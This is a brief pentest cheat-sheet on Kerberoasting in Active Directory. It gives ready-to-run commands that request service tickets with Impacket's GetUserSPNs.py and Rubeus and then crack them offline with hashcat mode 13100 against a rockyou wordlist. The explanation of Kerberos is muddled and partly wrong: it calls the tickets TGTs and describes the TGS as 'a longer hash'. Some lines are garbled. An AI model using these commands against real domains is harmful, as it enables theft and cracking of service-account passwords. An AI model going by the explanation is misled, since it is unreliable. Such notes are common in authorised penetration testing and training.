Kerberoasting
Basically Kerberos encripts TGTs which is just a ticket that the Domain Controller provides to the user, with the kerberos hash. The TGS is basically a longer hash afterwards. We present the TGS to be able to use other services without having to provide manual authentication. (NOT AD EXPERT DONT KILL ME :()
python3 GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of domain controller > -request
Also try thats not in impacket.
Kerberoasting with Rubeus
Rubeus.exe kerberoast
Cracking TGTs
hashcat -m 13100 -a 0 kerberosast.txt rockyou.txt
Last updated